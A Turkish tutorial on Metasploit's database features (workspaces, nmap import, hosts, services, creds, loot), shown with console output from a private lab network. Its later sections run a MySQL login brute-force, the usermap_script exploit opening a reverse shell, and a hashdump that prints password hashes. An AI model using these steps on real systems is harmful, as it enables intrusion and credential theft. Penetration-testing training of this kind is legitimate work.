MSF İçinde Database Kullanımı

Estimated read time 20 min read

Metasploit Framework içerisinde, Postgresql desteğiyle sunulan veri tabanı özelliği çok kullanışlıdır ve yapılacak tarama sonuçlarını bir yerde kayıt altına alır. Bulunan sonuçların kayıt altına alınması, sonraki adımlarda kullanılacak IP adresleri, Port numaraları veya Hash Dump vb. bilgilerin exploitlere aktarılmasına kolaylık sağlar.

Aşağıdaki anlatımda, Kali işletim sistemi temel alınmıştır ve komutlar Kali’de denemiştir.

Metasploit Veri tabanını Ayarlama

Öncelikle başlamamış ise postgresql başlatılmalıdır.

root@kali:~# systemctl start postgresql

Postgresql başladıktan sonra Veri tabanı ilk kullanıma hazırlanmalıdır. Bunun için “`msfdb init“ scriptini kullanabiliriz.

root@kali:~# msfdb init
Creating database user 'msf'
Enter password for new role: 
Enter it again: 
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema

Workspace Kullanımı

msfconsole başladığında öncelikle db_status komutuyla veri tabanı bağlantısını kontrol edelim.

msf > db_status 
[*] postgresql connected to msf

Veri tabanı bağlantısını sağladıktan sonra yapacağımız işleri Workspace olarak ifade edilen klasörlerde kayıt altına alarak organize edebiliriz. Normal bilgisayarlarda kayıtlarımızı nasıl klasörlerde konularına göre kayıt altına alıyorsak, msfconsole içinde aynı yaklaşım geçerlidir.

Workspace Listeleme

Basitçe hiçbir parametre vermeden workspace komutunu verdiğinizde, mevcut kayıtlı çalışma klasörleri listelenir. O an için aktif olan workspace başında * işaretiyle belirtilir.

msf > workspace
* default
 msfu
 lab1
 lab2
 lab3
 lab4
msf >

Workspace Oluşturma ve Silme

Yeni bir Worksace oluşturmak için -a parametresi, silme için ise -d parametresi kullanılır. Parametrenin ardından oluşturmak veya silmek istediğimiz Workspace adını yazmanız yeterlidir.

lab4 workspace oluşturulur

msf > workspace -a lab4
[*] Added workspace: lab4
msf > 

lab4 workspace silinir

msf > workspace -d lab4 
[*] Deleted workspace: lab4
msf > workspace

workspace değiştirme

workspace komutuyla mevcut klasörler listelendikten sonra aktif olan dışında başka bir klasöre geçmek istersek, aşağıdaki gibi workspace komutunun ardından geçmek istediğimiz klasörün adını yazmamız yeterlidir.

msf > workspace msfu
[*] Workspace: msfu
msf > workspace
 default
* msfu
 lab1
 lab2
 lab3
 lab4
msf >

Workspace Yardım

Detaylı yardım için -h parametresini kullanabilirsiniz.

msf > workspace -h
Usage:
  workspace         List workspaces
  workspace -v        List workspaces verbosely
  workspace [name]      Switch workspace
  workspace -a [name] ...  Add workspace(s)
  workspace -d [name] ...  Delete workspace(s)
  workspace -D        Delete all workspaces
  workspace -r   Rename workspace
  workspace -h        Show this help information

msf > 

Artık yapacağınız taramalarda elde edeceğiniz sonuçlar aktif olan workspace içerisinde kayıt edilecektir. Şimdi, sonraki adım olarak veri tabanı ile ilgili kullanabileceğimiz diğer komutlara bakalım.

Öncelikle, msfconsole veri tabanı ile ilgili hangi komutları bize sağlıyor ona bakalım. msfconsole içerisinde help komutu verdiğimizde veri tabanı komutları ayrı bir başlıkta aşağıdaki gibi bize gösterilir.

msf > help
...snip...

Database Backend Commands
=========================

  Command      Description
  -------      -----------
  creds       List all credentials in the database
  db_connect    Connect to an existing database
  db_disconnect   Disconnect from the current database instance
  db_export     Export a file containing the contents of the database
  db_import     Import a scan result file (filetype will be auto-detected)
  db_nmap      Executes nmap and records the output automatically
  db_rebuild_cache Rebuilds the database-stored module cache
  db_status     Show the current database status
  hosts       List all hosts in the database
  loot       List all loot in the database
  notes       List all notes in the database
  services     List all services in the database
  vulns       List all vulnerabilities in the database
  workspace     Switch between database workspaces

Veri Tabanı Kullanımı

Yukarıda, help komutuyla görüntülediğimiz komutları detaylı örnekleriyle görelim.

db_import

Bu komut, msfconsole dışında nmap ile yaptığınız tarama sonuçlarını içeri aktarmamızı sağlar. “`nmap“ taramasının çıktısını xml formatında kaydetmiş olmalısınız.

Aşağıdaki örnekte, /root/msfu/nmapScan isimli dosya, msfconsole içerisine aktarılmaktadır. Tarama dosyasında bulunan IP adresleri, portlar, servisler ve diğer tüm sonuç bilgileri artık içeri aktarılmış olacaktır. db_import komutunun ardından verilen hosts komutuyla kontrol yapılmıştır.

msf > db_import /root/msfu/nmapScan 
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Rex::Parser::NmapXMLStreamParser'
[*] Importing host 172.16.194.172
[*] Successfully imported /root/msfu/nmapScan
msf > hosts

Hosts
=====

address     mac        name os_name os_flavor os_sp purpose info comments
-------     ---        ---- ------- --------- ----- ------- ---- --------
172.16.194.172 00:0C:29:D1:62:80    Linux  Ubuntu      server     

msf > 

db_nmap

nmap tarama sonuçlarını dışarıdan içeri aktarabileceğiniz gibi msfconsole sayesinde, içeride de dışarı çıkmadan nmap taraması yapabilirsiniz. Bunun için db_nmap komutu kullanılmaktadır. db_nmap ile yapacağınız taramalar, otomatik olarak aktif olan workspace içine kayıt edilecektir.

msf > db_nmap -A 172.16.194.134
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-06-18 12:36 EDT
[*] Nmap: Nmap scan report for 172.16.194.134
[*] Nmap: Host is up (0.00031s latency).
[*] Nmap: Not shown: 994 closed ports
[*] Nmap: PORT   STATE SERVICE   VERSION
[*] Nmap: 80/tcp  open http     Apache httpd 2.2.17 ((Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 

...snip...

[*] Nmap: HOP RTT   ADDRESS
[*] Nmap: 1  0.31 ms 172.16.194.134
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 14.91 seconds
msf >


msf > hosts

Hosts
=====

address     mac        name os_name      os_flavor os_sp purpose info comments
-------     ---        ---- -------      --------- ----- ------- ---- --------
172.16.194.134 00:0C:29:68:51:BB    Microsoft Windows XP        server     
172.16.194.172 00:0C:29:D1:62:80    Linux       Ubuntu      server     

msf > 

db_export

Çalıştığınız bir projede yaptığınız tarama sonuçlarını dışarı aktarmak ve raporlarınızda kullanmak isteyebilirsiniz. Bunun için db_export komutunu bulunmaktadır. db_export komutuna -f parametresiyle beraber dosya ismini verdiğinizde, istediğiniz dosya belirttiğiniz dış klasöre aktarılır. Dışarı aktarımda iki farklı dosya çeşidi bulunur. xml formatında tüm bilgiler veya pwdump formatında kullanıcı adı ve parola vb. bilgiler.

Öncelikle yardım bilgisini görelim;

msf > db_export -h
Usage:
  db_export -f [-a] [filename]
  Format can be one of: xml, pwdump
[-] No output file was specified

Şimdi aktif olarak bulunduğumuz workspace içindeki bilgileri xml formatında dışa aktaralım.

msf > db_export -f xml /root/msfu/Exported.xml
[*] Starting export of workspace msfu to /root/msfu/Exported.xml [ xml ]...
[*]   >> Starting export of report
[*]   >> Starting export of hosts
[*]   >> Starting export of events
[*]   >> Starting export of services
[*]   >> Starting export of credentials
[*]   >> Starting export of web sites
[*]   >> Starting export of web pages
[*]   >> Starting export of web forms
[*]   >> Starting export of web vulns
[*]   >> Finished export of report
[*] Finished export of workspace msfu to /root/msfu/Exported.xml [ xml ]...

hosts

hosts komutu, o ana kadar yapılan taramaların sonucunda bulunan IP bilgileri, PORT bilgileri vb. bilgileri bize gösterir. Öncelikle, hosts komutunun yardım bilgilerini görüntüleyelim.

msf > hosts -h
Usage: hosts [ options ] [addr1 addr2 ...]

OPTIONS:
 -a,--add     Add the hosts instead of searching
 -d,--delete    Delete the hosts instead of searching
 -c   Only show the given columns (see list below)
 -h,--help     Show this help information
 -u,--up      Only show hosts which are up
 -o     Send output to a file in csv format
 -O    Order rows by specified column number
 -R,--rhosts    Set RHOSTS from the results of the search
 -S,--search    Search string to filter by
 -i,--info     Change the info of a host
 -n,--name     Change the name of a host
 -m,--comment   Change the comment of a host
 -t,--tag     Add or specify a tag to a range of hosts

Hosts içinde istenen sütunları görüntüleme

hosts komutunu tek başına kullandığınızda kayıtlı bilgiler, aşağıda listesi bulunan sütunlarda organize edilerek gösterilir.

Kullanılabilir Sütunlar: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags

Şimdi, sadece bilgilerini kullanacağımız sütunları ve bilgileri görüntüleyelim. Bunun için -c parametresini ve istediğimiz sütun adlarını yazmalıyız. Aşağıdaki örnekte, address, os_flavor sütunları ve bilgileri gösterilsin istenmiştir.

msf > hosts -c address,os_flavor

Hosts
=====

address     os_flavor
-------     ---------
172.16.194.134 XP
172.16.194.172 Ubuntu

Hosts Bilgilerini Modüllerde Kullanma

Yaptığımız taramalarda elde edilen bilgilerin tutulduğu hosts listesinden bir takım bilgileri, kullanmak istediğimiz modüllere aktarabiliriz. Yukarıda kullandığımız hosts -c address,os_flavor komutuyla istediğimiz sütunları görüntülemiştik. Şimdi bu listede arama yapalım ve sonuçların içerisinde “Ubuntu” geçen satırı arayalım.

msf > hosts -c address,os_flavor -S Linux

Hosts
=====

address     os_flavor
-------     ---------
172.16.194.172 Ubuntu

msf >

İşte kullanacağımız IP Adresini bulduk. Şimdi bir modül içerisine girelim ve modülün ihtiyacı olan değişkenlere bakalım.

msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

  Name     Current Setting Required Description
  ----     --------------- -------- -----------
  CONCURRENCY 10        yes    The number of concurrent ports to check per host
  FILTER            no    The filter string for capturing traffic
  INTERFACE           no    The name of the interface
  PCAPFILE           no    The name of the PCAP capture file to process
  PORTS    1-10000     yes    Ports to scan (e.g. 22-25,80,110-900)
  RHOSTS            yes    The target address range or CIDR identifier
  SNAPLEN   65535      yes    The number of bytes to capture
  THREADS   1        yes    The number of concurrent threads
  TIMEOUT   1000       yes    The socket connect timeout in milliseconds

Yukarıda çıktıda, RHOSTS değişken boş olarak görülmektedir. Buraya Remote Host IP adresinin girilmesi gerekiyor. Normalde işlemi set RHOSTS 172.16.194.172 komutuyla girebilirsiniz. Ancak bunu birden çok modül içinde ayarlamak, her seferinde hata yapa ihtimalinizi de arttıracaktır.

Bu durumda hosts -c address,os_flavor -S Linux komutuyla yaptığımız arama ile bulduğumuz IP adresini, sonuna -R parametresini ekleyerek doğrudan içinde bulunduğumuz modüle aktarabiliriz. Aşağıdaki örnekte görüldüğü gibi “Ubuntu” IP adresi direkt olarak tcp modülüne aktarılmıştır.

msf auxiliary(tcp) > hosts -c address,os_flavor -S Linux -R

Hosts
=====

address     os_flavor
-------     ---------
172.16.194.172 Ubuntu

RHOSTS => 172.16.194.172

msf auxiliary(tcp) > run

[*] 172.16.194.172:25 - TCP OPEN
[*] 172.16.194.172:23 - TCP OPEN
[*] 172.16.194.172:22 - TCP OPEN
[*] 172.16.194.172:21 - TCP OPEN
[*] 172.16.194.172:53 - TCP OPEN
[*] 172.16.194.172:80 - TCP OPEN

...snip...

[*] 172.16.194.172:5432 - TCP OPEN
[*] 172.16.194.172:5900 - TCP OPEN
[*] 172.16.194.172:6000 - TCP OPEN
[*] 172.16.194.172:6667 - TCP OPEN
[*] 172.16.194.172:6697 - TCP OPEN
[*] 172.16.194.172:8009 - TCP OPEN
[*] 172.16.194.172:8180 - TCP OPEN
[*] 172.16.194.172:8787 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

hosts listesinde arama ile filtre yapmadan, mevcut bulunan tüm IP adreslerini de aktif olan modüle aktarabiliriz. Bu durumda hosts komutuna hiçbir arama ifadesi girmeden sadece -R parametresi vermeniz yeterli olacaktır.

msf auxiliary(tcp) > hosts -R

Hosts
=====

address     mac        name os_name      os_flavor os_sp purpose info comments
-------     ---        ---- -------      --------- ----- ------- ---- --------
172.16.194.134 00:0C:29:68:51:BB    Microsoft Windows XP        server     
172.16.194.172 00:0C:29:D1:62:80    Linux       Ubuntu      server     

RHOSTS => 172.16.194.134 172.16.194.172

msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

  Name     Current Setting        Required Description
  ----     ---------------        -------- -----------
  CONCURRENCY 10               yes    The number of concurrent ports to check per host
  FILTER                   no    The filter string for capturing traffic
  INTERFACE                  no    The name of the interface
  PCAPFILE                  no    The name of the PCAP capture file to process
  PORTS    1-10000            yes    Ports to scan (e.g. 22-25,80,110-900)
  RHOSTS    172.16.194.134 172.16.194.172 yes    The target address range or CIDR identifier
  SNAPLEN   65535             yes    The number of bytes to capture
  THREADS   1               yes    The number of concurrent threads
  TIMEOUT   1000              yes    The socket connect timeout in milliseconds

Yukarıda gördüğünüz gibi tüm IP adresleri RHOSTS içine aktarılmıştır. Birkaç IP adresini elle girmek zaman alıcı olmasa da yüzlerce IP adresinde bir modülü çalıştırmak istediğinizde bu özelliğe mutlaka ihtiyaç duyacaksınız.

Örneğin, bir ağda tarama yaptınız ve 112 adet aktif olarak açık cihaz ve IP adresi buldunuz. Bunların hepsine smb_version modülünü denemek istiyorsunuz. İşte bu noktada hosts -R komutu işleri çok kolaylaştıracaktır.

Services

hosts komutu taramalarda bulunan IP ve diğer bilgileri verirken, services komutu da bu IP adreslerinde çalışan ve keşfedilen servisleri listeler. Tabii ki db_nmap komutu ile servis ve versiyon taraması yapmış olmanız gerekmektedir.

Öncelikle yardım bilgilerini görüntüleyelim.

msf > services -h

Usage: services [-h] [-u] [-a] [-r ] [-p >port1,port2>] [-s >name1,name2>] [-o ] [addr1 addr2 ...]

 -a,--add     Add the services instead of searching
 -d,--delete    Delete the services instead of searching
 -c   Only show the given columns
 -h,--help     Show this help information
 -s  Search for a list of service names
 -p  Search for a list of ports
 -r   Only show [tcp|udp] services
 -u,--up      Only show services which are up
 -o     Send output to a file in csv format
 -R,--rhosts    Set RHOSTS from the results of the search
 -S,--search    Search string to filter by

services komutu, bilgileri aşağıdaki sütunlarda organize ederek bize gösterir.

Kullanılabilir sütunlar: created_at, info, name, port, proto, state, updated_at

hosts komutunda nasıl arama yapıyorsak services içinde -c parametresi ile sütunlarda ve -S parametresi ile de belirli bir ifadeyi arayabiliriz.

Belirli Sütunlarda Arama

msf > services -c name,info 172.16.194.134

Services
========

host      name     info
----      ----     ----
172.16.194.134 http     Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1 
172.16.194.134 msrpc     Microsoft Windows RPC 
172.16.194.134 netbios-ssn  
172.16.194.134 http     Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1 
172.16.194.134 microsoft-ds Microsoft Windows XP microsoft-ds 
172.16.194.134 mysql 

Belirli Sütunlarda Özel Bir İfadeyi Arama

msf > services -c name,info -S http

Services
========

host      name info
----      ---- ----
172.16.194.134 http Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1 
172.16.194.134 http Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1 
172.16.194.172 http Apache httpd 2.2.8 (Ubuntu) DAV/2 
172.16.194.172 http Apache Tomcat/Coyote JSP engine 1.1 

Belirli Bir Portun Bulunduğu Sütunları Arama

msf > services -c info,name -p 445

Services
========

host      info                 name
----      ----                 ----
172.16.194.134 Microsoft Windows XP microsoft-ds   microsoft-ds
172.16.194.172 Samba smbd 3.X workgroup: WORKGROUP  netbios-ssn

Belirli Bir Port Aralığında İstenen Sütunları Arama

msf > services -c port,proto,state -p 70-81
Services
========
host      port proto state
----      ---- ----- -----
172.16.194.134 80  tcp  open
172.16.194.172 75  tcp  closed
172.16.194.172 71  tcp  closed
172.16.194.172 72  tcp  closed
172.16.194.172 73  tcp  closed
172.16.194.172 74  tcp  closed
172.16.194.172 70  tcp  closed
172.16.194.172 76  tcp  closed
172.16.194.172 77  tcp  closed
172.16.194.172 78  tcp  closed
172.16.194.172 79  tcp  closed
172.16.194.172 80  tcp  open
172.16.194.172 81  tcp closed

Belirli Bir Servisin ve IP Adresinin Port Bilgisini Arama

Yukarıda bir kaç örnekte -S büyük S ile belli bir ifadeyi aramıştık. -s parametresi de özellikle servisler listesinde arama yapmayı kolaylaştırır.

msf > services -s http -c port 172.16.194.134
Services
========
host      port
----      ----
172.16.194.134 80
172.16.194.134 443

Servisler İçinde Bir ifadeyi arama

msf > services -S Unr

Services
========
host      port proto name state info
----      ---- ----- ---- ----- ----
172.16.194.172 6667 tcp  irc open Unreal ircd
172.16.194.172 6697 tcp  irc open Unreal ircd

CSV Export

Hem hosts hem de services listelerinde kayıtlı bulunan bilgilerde yaptığımız arama sonuçlarını ekrana yazdırmak ile birlikte CSV formatında virgülle ayrılmış dosya biçiminde dışarı da aktarabilirsiniz. Aşağıda bir kaç örnek görülmektedir.

msf > services -s http -c port 172.16.194.134 -o /root/msfu/http.csv

[*] Wrote services to /root/msfu/http.csv

msf > hosts -S Linux -o /root/msfu/linux.csv
[*] Wrote hosts to /root/msfu/linux.csv

msf > cat /root/msfu/linux.csv
[*] exec: cat /root/msfu/linux.csv

address,mac,name,os_name,os_flavor,os_sp,purpose,info,comments
"172.16.194.172","00:0C:29:D1:62:80","","Linux","Debian","","server","",""

msf > cat /root/msfu/http.csv
[*] exec: cat /root/msfu/http.csv

host,port
"172.16.194.134","80"
"172.16.194.134","443"

Creds

creds komutu da hosts ve services komutlarına benzer olarak taramalarda elde edilen kullanıcı bilgileri ve parolaları bize gösterir. Hiçbir ek parametre girmeden creds komutunu verdiğinizde kayıtlı tüm kullanıcı bilgileri listelenir.

msf > creds

Credentials
===========

host port user pass type active?
---- ---- ---- ---- ---- -------

[*] Found 0 credentials.

db_nmap komutuyla yapılan aramalarda bulunan sonuçlar nasıl hosts ve services tablolarında tutuluyorsa, herhangi bir kullanıcı adı, parola bulma modülü kullandığınızda elde ettiğiniz bilgiler de creds tablosu içinde tutulur. Bir örnek görelim. Bu örnekte mysql_login modülü çalıştırılmakta ve 172.16.194.172 Ip adresinde çalışan MySql servisine login olarak oturum açma denemesi yapılmaktadır. Başarılı olunduğunda, başarılı olan kullanıcı adı ve parola bilgisi creds tablosuna sonradan kullanım için kayıt edilmektedir.

msf auxiliary(mysql_login) > run

[*] 172.16.194.172:3306 MYSQL - Found remote MySQL version 5.0.51a
[*] 172.16.194.172:3306 MYSQL - [1/2] - Trying username:'root' with password:''
[*] 172.16.194.172:3306 - SUCCESSFUL LOGIN 'root' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


msf auxiliary(mysql_login) > creds 

Credentials
===========

host      port user pass type   active?
----      ---- ---- ---- ----   -------
172.16.194.172 3306 root    password true

[*] Found 1 credential.
msf auxiliary(mysql_login) >

Creds Tablosuna Elle Veri Ekleme

Bir sistemde oturum açtığınızda, modül kullanmadan kendiniz bulduğunuz kullanıcı adı ve parola bilgilerini de, aşağıdaki örnekteki formatı kullanarak, sonradan kullanmak üzere creds tablosuna aktarabilirsiniz

msf > creds -a 172.16.194.134 -p 445 -u Administrator -P 7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
[*] Time: 2012-06-20 20:31:42 UTC Credential: host=172.16.194.134 port=445 proto=tcp sname= type=password user=Administrator pass=7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true

msf > creds

Credentials
===========

host      port user      pass                                 type   active?
----      ---- ----      ----                                 ----   -------
172.16.194.134 445  Administrator 7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: password true

[*] Found 1 credential.

Loot

Oturum açılan bir sistemde, genellikle ilk olarak hashdump yapılarak hash tablosu çıkarılır. İşte loot komutuyla, tarama sonucu elde edilen hash değerlerinin bilgisi görülebilir. Aşağıdaki örnekte, loot yardım görüntülenmektedir.

msf > loot -h
Usage: loot 
 Info: loot [-h] [addr1 addr2 ...] [-t ]
 Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] [-t [type]
 Del: loot -d [addr1 addr2 ...]

 -a,--add     Add loot to the list of addresses, instead of listing
 -d,--delete    Delete *all* loot matching host and type
 -f,--file     File with contents of the loot to add
 -i,--info     Info of the loot to add
 -t  Search for a list of types
 -h,--help     Show this help information
 -S,--search    Search string to filter by

Ardından usermap_script modülü kullanılarak karşı sistemde oturum açılmakta ve açılan session yani oturum için, hashdump modülü ile hash değerleri bulunmaktadır. Başarılı olunduğu takdirde bulunan hash değerleri sonradan kullanım için loot tablosuna kayıt edilmektedir.

msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 4uGPYOrars5OojdL;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "4uGPYOrars5OojdL\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:55138) at 2012-06-27 19:38:54 -0400

^Z
Background session 1? [y/N] y

msf exploit(usermap_script) > use post/linux/gather/hashdump
msf post(hashdump) > show options

Module options (post/linux/gather/hashdump):

  Name   Current Setting Required Description
  ----   --------------- -------- -----------
  SESSION 1        yes    The session to run this module on.

msf post(hashdump) > sessions -l

Active sessions
===============

 Id Type    Information Connection
 -- ----    ----------- ----------
 1  shell unix        172.16.194.163:4444 -> 172.16.194.172:55138 (172.16.194.172)

msf post(hashdump) > run

[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt
[*] Post module execution completed

Veri tabanında kayıtlı hash değerlerini görmek için loot komutunu vermeniz yeterlidir.

msf post(hashdump) > loot

Loot
====

host      service type     name          content   info              path
----      ------- ----     ----          -------   ----              ----
172.16.194.172      linux.hashes unshadowed_passwd.pwd text/plain Linux Unshadowed Password File /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt
172.16.194.172      linux.passwd passwd.tx       text/plain Linux Passwd File        /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.passwd_953644.txt
172.16.194.172      linux.shadow shadow.tx       text/plain Linux Password Shadow File   /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.shadow_492948.txt

Bu yazımızda, msfconsole içerisinde verilen help komutunda gösterilen Database ile ilgili komutları açıklamaya çalıştık.

Database Backend Commands
=========================

  Command      Description
  -------      -----------
  creds       List all credentials in the database
  db_connect    Connect to an existing database
  db_disconnect   Disconnect from the current database instance
  db_export     Export a file containing the contents of the database
  db_import     Import a scan result file (filetype will be auto-detected)
  db_nmap      Executes nmap and records the output automatically
  db_rebuild_cache Rebuilds the database-stored module cache
  db_status     Show the current database status
  hosts       List all hosts in the database
  loot       List all loot in the database
  notes       List all notes in the database
  services     List all services in the database
  vulns       List all vulnerabilities in the database
  workspace     Switch between database workspaces

vulns komutunu eksik bıraktığımızı düşünebilirsiniz. vulns komutunun ne işe yaradığını az çok tahmin etmek mümkündür. Yazı yeterince uzun oldu. vulns komutunu size bırakıyorum.